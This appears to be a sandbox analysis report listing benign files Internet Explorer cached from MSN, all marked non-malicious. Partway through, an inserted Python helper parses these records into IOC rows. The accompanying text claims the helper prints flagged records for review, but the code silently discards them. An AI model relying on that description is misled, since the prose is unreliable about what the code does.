SHA-256:01610B01E5DE324EFF1CD9F2377A97082117DF0F3BB679CA4A4BD45D581F84B2
SHA-512:2EA0085B93970208F14470FBC18BF9E7C6A23EF919236720A4822880621772CEB7DCBCD4D5D4B3087032984D2A0003959A1F991CF128872EE1164E38409F8342
Malicious:false
IE Cache URL:https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
Preview: <html>.<head></head>.<body style="margin: 0px; padding: 0px; background-color: transparent;">.<script language="javascript" type="text/javascript">window.mnjs=window.mnjs||{},window.mnjs.ERP=window.mnjs.ERP||function(){"use strict";for(var a="",l="",c="",f={},u=encodeURIComponent(navigator.userAgent),g=[],e=0;e<3;e++)g[e]=[];function m(e){void 0===e.logLevel&&(e={logLevel:3,errorVal:e}),3<=e.logLevel&&g[e.logLevel-1].push(e)}function n(){var e=0;for(s=0;s<3;s++)e+=g[s].length;if(0!==e){for(var n,o=new Image,t=f.lurl||"https://lg3-a.akamaihd.net/nerrping.php",r="",i=0,s=2;0<=s;s--){for(e=g[s].length,0;0<e;){if(n=1===s?g[s][0]:{logLevel:g[s][0].logLevel,errorVal:{name:g[s][0].errorVal.name,type:a,svr:l,servname:c,message:g[s][0].errorVal.message,line:g[s][0].errorVal.lineNumber,description:g[s][0].errorVal.description,stack:g[s][0].errorVal.stack}},n=n,!((n="object"!=typeof JSON||"function"!=typeof JSON.stringify?"JSON IS NOT SUPPORTED":JSON.stringify(n)).length+r.length<=1

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\otBannerSdk[1].js
Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:ASCII text, with very long lines, with CRLF line terminators
Category:downloaded
Size (bytes):353215
Entropy (8bit):5.298793785430684
Encrypted:false
SSDEEP:3072:BpqAkqNs7z+NwHr5GR74A+x8sP/An4bb4yxL/Z8NdWRHnoVVMyDkpZ:B0C8zZ5G+x8sP/Ani4yxDAdWRHoVVAZ
MD5:9982BA07340077CE7240B75C6C6FCBB4
SHA1:D776E39E13F151C5ED2F7E5761EDE13D9CC72D27
SHA-256:87C99BCF98F3DA7D1429DAC8184E3212634B65706CE7740CE940D1553B57DAAA
SHA-512:3EEB895128D38BBBE4FDE8CD71B4FC563C38FFA2F1BCBB3A323D280B4812B0B111DEC1D745BE8EE8F792F7977978FFF03BB00C795C3F5CAFE6E62B3EDF2E88FD
Malicious:false
IE Cache URL:https://www.msn.com/_h/e012d846/webcore/externalscripts/oneTrustV2/scripttemplates/6.4.0/otBannerSdk.js
Preview: /** .. * onetrust-banner-sdk.. * v6.7.0.. * by OneTrust LLC.. * Copyright 2020 .. */..!function () { "use strict"; var o = function (e, t) { return (o = Object.setPrototypeOf || { __proto__: [] } instanceof Array && function (e, t) { e.__proto__ = t } || function (e, t) { for (var o in t) t.hasOwnProperty(o) && (e[o] = t[o]) })(e, t) }; var r = function () { return (r = Object.assign || function (e) { for (var t, o = 1, n = arguments.length; o < n; o++)for (var r in t = arguments[o]) Object.prototype.hasOwnProperty.call(t, r) && (e[r] = t[r]); return e }).apply(this, arguments) }; function l(s, i, a, l) { return new (a = a || Promise)(function (e, t) { function o(e) { try { r(l.next(e)) } catch (e) { t(e) } } function n(e) { try { r(l.throw(e)) } catch (e) { t(e) } } function r(t) { t.done ? e(t.value) : new a(function (e) { e(t.value) }).then(o, n) } r((l = l.apply(s, i || [])).next()) }) } function k(o, n) { var r, s, i, e, a = { label: 0, sent: function () { if (1 & i[0]) throw i[1]

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\otSDKStub[1].js
Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:ASCII text, with very long lines, with CRLF line terminators
Category:downloaded
Size (bytes):13479
Entropy (8bit):5.3011996311072425
Encrypted:false
SSDEEP:192:TQp/Oc/tBPEocTcgMg97k0gA3wziBpHfkmZqWoa:8R9aTcgMNADXHfkmvoa
MD5:BC43FF0C0937C3918A99FD389A0C7F14
SHA1:7F114B631F41AE5F62D4C9FBD3F9B8F3B408B982
SHA-256:E508B6A9CA5BBAED7AC1D37C50D796674865F2E2A6ADAFAD1746F19FFE52149E
SHA-512:C3A1F719F7809684216AB82BF0F97DD26ADE92F851CD81444F7F6708BB241D772DBE984B7D9ED92F12FE197A486613D5B3D8E219228825EDEEA46AA8181010B9
Malicious:false
IE Cache URL:https://www.msn.com/_h/e012d846/webcore/externalscripts/oneTrustV2/scripttemplates/otSDKStub.js
Preview: var OneTrustStub=function(t){"use strict";var l=new function(){this.optanonCookieName="OptanonConsent",this.optanonHtmlGroupData=[],this.optanonHostData=[],this.genVendorsData=[],this.IABCookieValue="",this.oneTrustIABCookieName="eupubconsent",this.oneTrustIsIABCrossConsentEnableParam="isIABGlobal",this.isStubReady=!0,this.geolocationCookiesParam="geolocation",this.EUCOUNTRIES=["BE","BG","CZ","DK","DE","EE","IE","GR","ES","FR","IT","CY","LV","LT","LU","HU","MT","NL","AT","PL","PT","RO","SI","SK","FI","SE","GB","HR","LI","NO","IS"],this.stubFileName="otSDKStub",this.DATAFILEATTRIBUTE="data-domain-script",this.bannerScriptName="otBannerSdk.js",this.mobileOnlineURL=[],this.isMigratedURL=!1,this.migratedCCTID="[[OldCCTID]]",this.migratedDomainId="[[NewDomainId]]",this.userLocation={country:"",state:""}},e=(i.prototype.initConsentSDK=function(){this.initCustomEventPolyfill(),this.ensureHtmlGroupDataInitialised(),this.updateGtmMacros(),this.fetchBannerSDKDependency()},i.prototype.fetchBanner

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\85-0f8009-68ddb2ab[1].js
Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:UTF-8 Unicode text, with very long lines, with no line terminators
Category:dropped
Size (bytes):391843
Entropy (8bit):5.323521567582823
Encrypted:false
SSDEEP:6144:Rrf9z/Y7Sg/FDMxqkhmnid1WPqIjHSjae1dWgxO0Dvq4FcG6Ix2K:dJ/Ynznid1WPqIjHdYltHcGB3
MD5:CDD6C5E31F58A546B6F9637389B2503B
SHA1:0ADA1E1C82B8E7636F6DAF4CE78D571C80A3E81A
SHA-256:4CC5BC89E9F4E54FE905AB22340FA3793FE04F30453DC17CE2780D61DB35D5D4
SHA-512:11FD84FE2EAB4FFEBAF45D8D509E7E8E927540A3D67CCADB65AB7C7A7F22F1922411A02157B404D2CA652D6AEF8809B659C0D4106F2F57B6B02911D85B06A4DB
Malicious:false
Preview: var awa,behaviorKey,Perf,globalLeft,Gemini,Telemetry,utils,data,MSANTracker,deferredCanary,g_ashsC,g_hsSetup,canary;window._perfMarker&&window._perfMarker("TimeToJsBundleExecutionStart");define("jqBehavior",["jquery","viewport"],function(n){return function(t,i,r){function u(n){var t=n.length;return t>1?function(){for(var i=0;i<t;i++)n[i]()}:t?n[0]:f}function f(){}if(typeof t!="function")throw"Behavior constructor must be a function";if(i&&typeof i!="object")throw"Defaults must be an object or null";if(r&&typeof r!="object")throw"Exclude must be an object or null";return r=r||{},function(f,e,o){function c(n){n&&(typeof n.setup=="function"&&l.push(n.setup),typeof n.teardown=="function"&&a.push(n.teardown),typeof n.update=="function"&&v.push(n.update))}var h;if(o&&typeof o!="object")throw"Options must be an object or null";var s=n.extend(!0,{},i,o),l=[],a=[],v=[],y=!0;if(r.query){if(typeof f!="string")throw"Selector must be a string";c(t(f,s))}else h=n(f,e),r.each?c(t(h,s)):(y=h.length>0,

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\BB15AQNm[1].jpg
Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 192x192, segment length 16, baseline, precision 8, 622x368, frames 3
Category:downloaded
Size (bytes):23518
Entropy (8bit):7.93794948271159
Encrypted:false
SSDEEP:384:7XNEQW4OGoP8X397crjXt1/v2032/EcJ+eGovCO2+m5fC/lWL2ZSwdeL5HER4ycP:7uf4ik390Xt1vP2/RVCqm5foMyDdeiRU
MD5:C701BB9A16E05B549DA89DF384ED874D
SHA1:61F7574575B318BDBE0BADB5942387A65CAB213C
SHA-256:445339480FB2AE6C73FF3A11F9F9F3902588BFB8093D5CC8EF60AF8EF9C43B35
SHA-512:AD226B2FE4FF44BBBA00DFA6A7C572BD2433C3821161F03A811847B822BA4FC9F311AD1A16C5304ABE868B0FA1F548B8AEF988D87345AEB579B9F31A74D5BF3C
Malicious:false
IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB15AQNm.img?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=jpg&x=868&y=379
Preview: ......JFIF.............C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......p.n.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...(...CKHh.........i.@.....i..lR2...MpR..^E....&EYv..N.j...e..j..U,..*..BZ...qQM.dT....@..8..s..i..}....n..D...i.....VC.HK"..T.iX.f.v&.}.v..7..jV.....jF.c..NhS.L.b>x".D...,..G.Z..!.i..VO..._4.@X.].p..].5b+...Uk...((@.s'..?Hv............\z.z.JGih..}*S.....T..WBZ...'.T?6..j.H"....*..%p3.YnEc.W.f.^......Q.....#..k..Z......I:..MC..H.S..#..Y ..A.Zr...T..H..P..[..b.C.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\BB17milU[1].png
Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:downloaded
Size (bytes):627
Entropy (8bit):7.4822519699232695
Encrypted:false
SSDEEP:12:6v/78/W/6TiIP7X0TFI8uqNN9pEsGCLDOk32Se5R2bBCEYPk79kje77N:U/6xPT0TtNNDGCLDOMVe5JEAkv3N
MD5:DDE867EA1D9D8587449D8FA9CBA6CB71
SHA1:1A8B95E13686068DD73FDCDD8D9B48C640A310C4
SHA-256:3D5AD319A63BCC4CD963BDDCF0E6A629A40CC45A9FB14DEFBB3F85A17FCC20B2
SHA-512:83E4858E9B90B4214CDA0478C7A413123402AD53C1539F101A094B24C529FB9BFF279EEFC170DA2F1EE687FEF1BC97714A26F30719F271F12B8A5FA401732847
Malicious:false
IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17milU.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Preview: .PNG........IHDR................a....sRGB.........gAMA......a.....pHYs.................IDAT8O.S.KTQ...yj..tTZ..VA.r.B*A.rYA.FY...V..""*(.Jh.E -,..j......?.z..{:...8.....{s....q.A. HS....x>......Rp.<.B.&....b...TT....@..x....8.t..c.q.q.].d.'v.G...8.c.[..ex.vg......x}..A7G...R.H..T...g.~..............0....H~,.2y...)...G..0tk..{.."f~h.G..#?2......}]4/..54...]6A. Iik...x-T.;u..5h._+.j.....{.e.,........#....;...Q>w...!.....A..t<../>...s.....ha...g.|Y...9[.....:..........1....c.:.7l....|._.o..H.Woh."dW..).D.&O1.XZ"I......y.5..>..j..7..z..3....M|..W...2....q.8.3.......~}89........G.+.......IEND.B`.
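The records above are the report's own dropped/cached-file listing for this run: each file is a Windows path followed by Key:Value lines (hashes, size, entropy, the IE cache URL, a preview). Before lifting digests out of such a listing into an IOC list it is worth parsing it mechanically and checking that every digest has the right length, that the size and entropy fields are numeric, and that "Malicious" is actually set, since copy-paste from a rendered report is where truncated hashes creep in. The following is an added example, not code from the Joe Sandbox report or from the Ursnif analysis. It parses records in the format shown, validates them, reduces clean ones to shareable rows, and recomputes 8-bit Shannon entropy (bits per byte, assumed here to be what the report's "Entropy (8bit)" field measures). The sample input embeds the otSDKStub[1].js record from this page followed by a constructed, deliberately malformed record; the constructed path and its values are not from the report.

```python
import math
import re
from collections import Counter

# Added example, not part of the sandbox report: parse the dropped-file
# records shown above, sanity-check each one before its digests go into an
# IOC list, and recompute the 8-bit Shannon entropy the report's
# "Entropy (8bit)" field is assumed to report.

PATH_RE = re.compile(r"^[A-Za-z]:\\")  # a record begins at a Windows path line
FIELD_RE = re.compile(
    r"^(Process|File Type|Category|Size \(bytes\)|Entropy \(8bit\)|Encrypted|"
    r"SSDEEP|MD5|SHA1|SHA-256|SHA-512|Malicious|IE Cache URL|Preview):(.*)$"
)
HEX_RE = re.compile(r"^[0-9A-Fa-f]+$")
DIGEST_LEN = {"MD5": 32, "SHA1": 40, "SHA-256": 64, "SHA-512": 128}


def parse_records(text):
    """One dict per file record; leading whitespace and unknown lines are ignored."""
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if PATH_RE.match(line):
            current = {"path": line}
            records.append(current)
            continue
        m = FIELD_RE.match(line)
        if m and current is not None:
            current[m.group(1)] = m.group(2).strip()
    return records


def check_record(rec):
    """Problems that make a record unsafe to copy into an IOC list (empty list = clean)."""
    problems = []
    for name, length in DIGEST_LEN.items():
        value = rec.get(name, "")
        if len(value) != length or not HEX_RE.match(value):
            problems.append(f"{name} is not a {length}-hex-digit digest")
    if not rec.get("Size (bytes)", "").isdigit():
        problems.append("Size (bytes) missing or non-numeric")
    try:
        if not 0.0 <= float(rec["Entropy (8bit)"]) <= 8.0:
            problems.append("Entropy (8bit) outside 0..8")
    except (KeyError, ValueError):
        problems.append("Entropy (8bit) missing or non-numeric")
    if rec.get("Malicious", "").lower() not in ("true", "false"):
        problems.append("Malicious flag missing")
    return problems


def shannon_entropy(data):
    """Bits per byte in 0..8; assumed to match the report's Entropy (8bit) field."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def ioc_rows(text):
    """Clean records reduced to the fields worth sharing; malformed ones are dropped."""
    rows = []
    for rec in parse_records(text):
        if check_record(rec):
            continue
        rows.append({
            "path": rec["path"],
            "category": rec.get("Category"),
            "url": rec.get("IE Cache URL"),
            "sha256": rec["SHA-256"].lower(),
            "malicious": rec["Malicious"].lower() == "true",
        })
    return rows


# Sample input: the otSDKStub[1].js record from this page, then a constructed,
# deliberately malformed record (truncated MD5, no SHA digests at all).
SAMPLE = r"""
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\otSDKStub[1].js
Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:ASCII text, with very long lines, with CRLF line terminators
Category:downloaded
Size (bytes):13479
Entropy (8bit):5.3011996311072425
Encrypted:false
SSDEEP:192:TQp/Oc/tBPEocTcgMg97k0gA3wziBpHfkmZqWoa:8R9aTcgMNADXHfkmvoa
MD5:BC43FF0C0937C3918A99FD389A0C7F14
SHA1:7F114B631F41AE5F62D4C9FBD3F9B8F3B408B982
SHA-256:E508B6A9CA5BBAED7AC1D37C50D796674865F2E2A6ADAFAD1746F19FFE52149E
SHA-512:C3A1F719F7809684216AB82BF0F97DD26ADE92F851CD81444F7F6708BB241D772DBE984B7D9ED92F12FE197A486613D5B3D8E219228825EDEEA46AA8181010B9
Malicious:false
IE Cache URL:https://www.msn.com/_h/e012d846/webcore/externalscripts/oneTrustV2/scripttemplates/otSDKStub.js
C:\Users\user\AppData\Local\Temp\constructed-example.bin
Category:dropped
Size (bytes):512
Entropy (8bit):7.91
MD5:DEADBEEF
Malicious:true
"""
```

Paste a whole listing into `SAMPLE` (or read it from a file) and call `ioc_rows` on it; anything `check_record` flags is printed for manual review rather than silently dropped from the IOC set. The entropy helper is there so that a file you recover from the cache yourself can be compared against the reported value, which is a quick way to confirm you pulled the same bytes the sandbox hashed.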

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\BB1cEP3G[1].png
Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced
Category:downloaded
Size (bytes):1103
Entropy (8bit):7.759165506388973
Encrypted:false
SSDEEP:24:sWl+1qOC+JJAmrPGUDiRNO20LMDLspJq9a+VXKJL3fxYSIP:sWYjJJ3rPFWToEspJq9DaxWSA
MD5:18851868AB0A4685C26E2D4C2491B580
SHA1:0B61A83E40981F65E8317F5C4A5C5087634B465F
SHA-256:C7F0A19554EC6EA6E3C9BD09F3C662C78DC1BF501EBB47287DED74D82AFD1F72
                                                                                                                                                                                                    SHA-512:BDBAD03B8BCA28DC14D4FF34AB8EA6AD31D191FF7F88F985844D0F24525B363CF1D0D264AF78B202C82C3E26323A0F9A6C7ED1C2AE61380A613FF41854F2E617
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cEP3G.img?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\BB1dCSOZ[1].png
                                                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                    File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                    Size (bytes):403
                                                                                                                                                                                                    Entropy (8bit):7.182669559509179
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6:6v/lhPkR/ChmxB+DAdpKjss+V7qGlW1Fr19yXirs8+qxGwl0ZtH4NZo8oVfpWmix:6v/78/zBNdpcsLlE3yyrsYGW0ZtYNu4x
                                                                                                                                                                                                    MD5:5F25361D8730566E8A8C453E8CC1339D
                                                                                                                                                                                                    SHA1:CD0C5A8D20810511C42D2EB37381EA9213568EDD
                                                                                                                                                                                                    SHA-256:7763287F5905D00A46BF4760FCF6C19E5BB0F234776BCAD174754BFBE304CF58
                                                                                                                                                                                                    SHA-512:DE8E82683A01745DD19C2AD25A7653B4AE356ED6278147019F0D1557DB0A689465FF70F7D927041BFA96D2A1C5F3F84DB24C1559E3CF7AB6D29D6B6BFDBC4707
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1dCSOZ.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\BB1dH8OJ[1].jpg
                                                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 206x250, frames 3
                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                    Size (bytes):5977
                                                                                                                                                                                                    Entropy (8bit):7.888120339421369
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:96:xGAaEsbIRtGwanIkO5in5o/Z8vkVyyURPLviACTppYt82vnLeiMyuF59iN8F29SU:xCZbQ8vnIkORZ8vkVy9RDiAC8txLjk4v
                                                                                                                                                                                                    MD5:6B4A50D78C876AA0E985EE05096F8803
                                                                                                                                                                                                    SHA1:3AD0DCB44FBB4CD693C49B969E2AA9C7FFA85D5C
                                                                                                                                                                                                    SHA-256:35A290B70BEF0733752F699867D3C690866D7421CBB268285A5784521909326E
                                                                                                                                                                                                    SHA-512:E23AB9438C23594A2ED9DBAA0157C091C6EFCAE3ED06F689B6AD45878B4F46710001C26297C544149DE7F800B447986AFF2C3432DFDEEAD2BEABAE0254FB3630
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1dH8OJ.img?h=250&w=206&m=6&q=60&u=t&o=t&l=f&f=jpg
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\BB1dHA3W[1].jpg
                                                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 311x333, frames 3
                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                    Size (bytes):15203
                                                                                                                                                                                                    Entropy (8bit):7.959738673622329
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:384:eqeRhr7i+eV9PieIwMIeC4863PhshiVgg:eqb6e1O//hshiVgg
                                                                                                                                                                                                    MD5:1073767D3A3C229A115D3972CA15FF12
                                                                                                                                                                                                    SHA1:86E9BA8E55BA3C524972A93D31645D5B25B0AC28
                                                                                                                                                                                                    SHA-256:0EE8C7507A57750E4BB0B3A15843DA7ADEF04F6A1DD0CA342A6B38F199996677
                                                                                                                                                                                                    SHA-512:484625854F13AF238F065E3E8CD7D8BDDA71E3D0980994D062261CB02C25330089EFB98F85AC995866E4A96C1ACF8021D0910BA438BFC319800A0CDD6C99D8F3
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1dHA3W.img?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jpg
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\BB1dHDkQ[1].jpg
                                                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, baseline, precision 8, 206x250, frames 3
                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                    Size (bytes):10017
                                                                                                                                                                                                    Entropy (8bit):7.948305846257749
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:BCObmz+mZYxdKJUOSwwMtx413gVgHdnRrFJQX8EuFaJZTXluor:kOb/mZYr0UEwMr41QC9pFasEkYlD
                                                                                                                                                                                                    MD5:AD364F520A0382EF236AE304AA6415CC
                                                                                                                                                                                                    SHA1:792269064259F8A83ACC425DBA137C9F1226CD51
                                                                                                                                                                                                    SHA-256:CB1594B89C70600401837A2CE4B8C5DEC43CADDBFF5C96DA674DC56B7A93B2F9
                                                                                                                                                                                                    SHA-512:CACAC1DD9DFEF89D9A3F615F1F180ECCA20156C2AEB4C79F645003F744669C52591C6517CF54F92484221E36B5893730C87C6E11771F45C3EC9ABCC6C503D5A2
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1dHDkQ.img?h=250&w=206&m=6&q=60&u=t&o=t&l=f&f=jpg&x=533&y=184
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\BB1dHNjB[1].jpg
                                                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 311x333, frames 3
                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                    Size (bytes):21408
                                                                                                                                                                                                    Entropy (8bit):7.957857831315479
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:384:ONcjYYAyNKg19gbA5zWEcq/Ei6Cghc1wrzfhcZIkRWZh/T8JE0gLeMI6+Q:Omfr7Lgc5yYUrr3tTEgL26b
                                                                                                                                                                                                    MD5:66E13DEA8349F22AC167937C2611AC21
                                                                                                                                                                                                    SHA1:EC48DA19B0B80412C8DB6A3F26C68D0862BE6363
                                                                                                                                                                                                    SHA-256:EDBE0AD4E5B4D8E5E87B3323555528F374E468020595269CCFB2B6782FBDB436
                                                                                                                                                                                                    SHA-512:2243CD512008293A384EAECC6696FAF0A57CB889999910C44F22DC9CCC212C83974CAFA2EFA38EB35C15FFB15012203EE6A92725148A5B8558F87371E77053F2
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1dHNjB.img?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jpg&x=626&y=269
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\BB1dHgEB[1].jpg
                                                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 310x166, frames 3
                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                    Size (bytes):5189
                                                                                                                                                                                                    Entropy (8bit):7.880140257901953
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:96:BGEE6zMUpF8ABIADVxZtzrvCushprODsvk87jtjLNUQv8MdE:BFnTpIOlzuXnvkUtjtdE
                                                                                                                                                                                                    MD5:74B167BF2E58CD68DEF244DEC6D743B0
                                                                                                                                                                                                    SHA1:9C5C5937A028D6509D547A6BE903843E89BEFF05
                                                                                                                                                                                                    SHA-256:24EF6B7ADC8621B0E7A4B9DA591308E941A1DF49665B5B524774E8288779586D
                                                                                                                                                                                                    SHA-512:6C9F1EE729C8B94CB6063AAB9C068B2F1FBAEC64887D524CB64AB852EA7FB463FDD54DFF50419F754E7288E36DAF05264F90526F1F450200B3154ACAEAAFE153
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1dHgEB.img?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jpg
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\BB1dHhSJ[1].jpg
                                                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 206x250, frames 3
                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                    Size (bytes):7289
                                                                                                                                                                                                    Entropy (8bit):7.9374002451816015
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:xCLv/XU8uZlJbhluzlAjzotkuXrkVOfjVHm2vu6qnr00otj:ULvPUjB2xuh7oVG2/ySj
                                                                                                                                                                                                    MD5:0CC4BBA7173007E90589461E4A7179EF
                                                                                                                                                                                                    SHA1:A943E2298F1F9123D97D9D198FD61F6F62695CB0
                                                                                                                                                                                                    SHA-256:516702589A5B41C91F0D6C7C18DB3800B7CB6CF5612E88FC50572411B0FB8B45
                                                                                                                                                                                                    SHA-512:1A433E36F6FFBC6F6076F07755BA0102281B44FAAA52C36608EC0D1A1B3EF3DE402BEE5730457AF9D631DC85EA6F5A424F6CBE9DFBC15F8D351EF7F35BB85665
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1dHhSJ.img?h=250&w=206&m=6&q=60&u=t&o=t&l=f&f=jpg&x=643&y=233
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\BB1dHqD2[1].jpg
                                                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 622x368, frames 3
                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                    Size (bytes):28464
                                                                                                                                                                                                    Entropy (8bit):7.96093606547751
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:768:7EJtcJF/KJyGBx9nkoOoge4DB0LWYgJ2Zxt1vaK8af:7EyjKJ9Bn1Oogn06Y1ZcG
                                                                                                                                                                                                    MD5:E38552C3BAD509D4FCB24C4C706E0CD5
                                                                                                                                                                                                    SHA1:2AE245AEF45186459BBDBD95BDD8F403E65D0A17
                                                                                                                                                                                                    SHA-256:AA8D1A16D3782F693F2CCE6006646D1E51E61AED1800507BC4570846C5FAE792
                                                                                                                                                                                                    SHA-512:BADE48EDB988822D445C667A964CA84F5B6B7E16AC28C40E850ABCBEF603D954951DAFE4CCF77DD88E31F5224C9D82E8FAC938276FE5177C45DEE13115F905C4
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1dHqD2.img?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=jpg
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\BB1dHqH1[1].jpg
                                                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 622x368, frames 3
                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                    Size (bytes):16727
                                                                                                                                                                                                    Entropy (8bit):7.890731722624281
                                                                                                                                                                                                    Encrypted:false
